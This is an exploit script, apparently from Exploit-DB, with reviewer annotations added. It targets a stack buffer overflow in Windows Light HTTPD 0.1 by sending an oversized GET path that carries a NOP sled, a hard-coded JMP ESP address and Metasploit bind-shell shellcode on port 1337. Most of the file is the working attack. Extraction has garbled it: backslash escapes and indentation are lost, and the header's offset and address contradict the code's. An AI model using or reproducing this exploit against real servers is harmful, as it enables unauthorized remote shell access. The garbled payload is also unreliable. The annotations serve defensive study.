# Title : Windows Light HTTPD 0.1 - Buffer Overflow
# Published : 2013-04-25
# Author :
import urllib2
from time import sleep
#########################################################################################################################################
# Title************************Windows Light HTTPD v0.1 HTTP GET Buffer Overflow
# Discovered and Reported******24th of April, 2013
# Discovered/Exploited By******Jacob Holcomb/Gimppy042
# Software Vendor**************http://sourceforge.net/projects/lhttpd/?source=navbar
# Exploit/Advisory*************http://infosec42.blogspot.com/
# Software*********************Light HTTPD v0.1
# Tested Platform**************Windows XP Professional SP2
# Date*************************24/04/2013
#
#PS - This is a good piece of software to practice Stack Based Buffer Overflows if you curiouz and want to learnz
#########################################################################################################################################
# Exploit-DB Note: Offset 255 for Windows XP SP3
# jmp esp ntdll 0x7c31fcd8
# payload = "x90" * 255 + "xd8xfcx91x7c" + "x90" * 32 + shellcode
def targURL():
"""Prompt (Python 2 raw_input) until a URL beginning with "http://" is entered; return it as str.

The loop only exits when the input is non-empty and its first seven
characters are exactly "http://".  No other validation is done on the
host or port part.
"""
# NOTE(review): the listing's indentation was lost in extraction; the body
# lines sit at column 0 here exactly as they appear on the page, and the
# "\" of the "\n" escapes inside the prompt strings is missing as well.
while True:
URL = raw_input("n[*] Please enter the URL of the Light HTTP server you would like to PWN. Ex. http://192.168.1.1nn>")
# Accepts only a literal "http://" prefix.  The error text below also
# mentions https://, but an https:// URL never passes this check.
if len(URL) != 0 and URL[0:7] == "http://":
break
else:
print "nn[!!!] Target URL cant be null and must contain http:// or https:// [!!!]n"
# Short pause before re-prompting.
sleep(1)
return str(URL)
def main():
"""Send one crafted HTTP GET to the chosen Light HTTPD instance on port 3000.

The request path is built from a filler string, a hard-coded ntdll.dll
address and the embedded shellcode string, then fetched with a 6-second
timeout.  A URLError is reported as "server offline"; every other
exception (timeout, reset) is reported as "payload sent" - see the bare
except at the bottom.

From a defender's view the observable is a single GET whose request path
is several hundred bytes long and dominated by repeated filler; a
hard-coded module address like the one below is only valid for one exact
OS/DLL build and is defeated by ASLR/DEP on later platforms.
"""
target = targURL()
# msfpayload windows/shell_bind_tcp EXITFUNC=thread LPORT=1337 R | msfencode -c 1 -e x86/shikata_ga_nai -b "x00x0ax0dxffx20" R
# NOTE(review): the escape backslashes appear to have been lost in
# extraction - as written these are plain ASCII strings ("xb8x3b..."),
# not the raw bytes the msfpayload comment above describes.  The same
# applies to the filler and address strings used for `payload` below.
shellcode = "xb8x3bxafxc1x8axdbxcdxd9x74x24xf4x5ax29xc9"
shellcode += "xb1x56x83xc2x04x31x42x0fx03x42x34x4dx34x76"
shellcode += "xa2x18xb7x87x32x7bx31x62x03xa9x25xe6x31x7d"
shellcode += "x2dxaaxb9xf6x63x5fx4ax7axacx50xfbx31x8ax5f"
shellcode += "xfcxf7x12x33x3ex99xeex4ex12x79xcex80x67x78"
shellcode += "x17xfcx87x28xc0x8ax35xddx65xcex85xdcxa9x44"
shellcode += "xb5xa6xccx9bx41x1dxcexcbxf9x2ax98xf3x72x74"
shellcode += "x39x05x57x66x05x4cxdcx5dxfdx4fx34xacxfex61"
shellcode += "x78x63xc1x4dx75x7dx05x69x65x08x7dx89x18x0b"
shellcode += "x46xf3xc6x9ex5bx53x8dx39xb8x65x42xdfx4bx69"
shellcode += "x2fxabx14x6exaex78x2fx8ax3bx7fxe0x1ax7fxa4"
shellcode += "x24x46x24xc5x7dx22x8bxfax9ex8ax74x5fxd4x39"
shellcode += "x61xd9xb7x55x46xd4x47xa6xc0x6fx3bx94x4fxc4"
shellcode += "xd3x94x18xc2x24xdax33xb2xbbx25xbbxc3x92xe1"
shellcode += "xefx93x8cxc0x8fx7fx4dxecx5ax2fx1dx42x34x90"
shellcode += "xcdx22xe4x78x04xadxdbx99x27x67x6ax9exe9x53"
shellcode += "x3fx49x08x64xbaxb0x85x82xaexd2xc3x1dx46x11"
shellcode += "x30x96xf1x6ax12x8axaaxfcx2axc4x6cx02xabxc2"
shellcode += "xdfxafx03x85xabxa3x97xb4xacxe9xbfxbfx95x7a"
shellcode += "x35xaex54x1ax4axfbx0exbfxd9x60xcexb6xc1x3e"
shellcode += "x99x9fx34x37x4fx32x6exe1x6dxcfxf6xcax35x14"
shellcode += "xcbxd5xb4xd9x77xf2xa6x27x77xbex92xf7x2ex68"
shellcode += "x4cxbex98xdax26x68x76xb5xaexedxb4x06xa8xf1"
shellcode += "x90xf0x54x43x4dx45x6bx6cx19x41x14x90xb9xae"
shellcode += "xcfx10xd9x4cxc5x6cx72xc9x8cxccx1fxeax7bx12"
shellcode += "x26x69x89xebxddx71xf8xeex9ax35x11x83xb3xd3"
shellcode += "x15x30xb3xf1"
#7C941EED FFE4 JMP ESP ntdll.dll
# NOTE(review): the page header quotes a different offset (255) and a
# different ntdll address for XP SP3 than the 258 / 0x7C941EED used on this
# line; which pair the author tested against is not stated on the page.
payload = "x90" * 258 + "xEDx1Ex94x7C" + "x90" * 32 + shellcode
# Light HTTPD's listener port as used by the author; the whole payload
# travels in the request path, so the server sees it as part of the GET line.
port = ":3000/"
sploit = target + port + payload
try:
# target[7:] drops the "http://" prefix for display only.
print "n[*] Preparing to send Evil PAYLoAd to %s!n[*] Payload Length: %dn[*] Waiting..." % (target[7:], len(sploit))
httpRequest = urllib2.Request(sploit)
# Third positional argument is the timeout in seconds; `sploit` is rebound
# to the response object, which is never used.
sploit = urllib2.urlopen(httpRequest, None, 6)
except(urllib2.URLError):
print "n[!!!] Error. Please check that the Light HTTP Server is online [!!!]n"
except:
# Bare except: a timeout or connection reset after the request is
# interpreted as the server having crashed, i.e. the overflow landed.
# It also swallows any unrelated error (e.g. a KeyboardInterrupt).
print "n[!!!] The server did not respond, but the payload was sent. F!ng3r$ Cr0$$3d 4 c0d3 Ex3cut!0n! [!!!]n"
# Script entry point: prompt for a target URL, then send the single request.
if __name__ == "__main__":
main()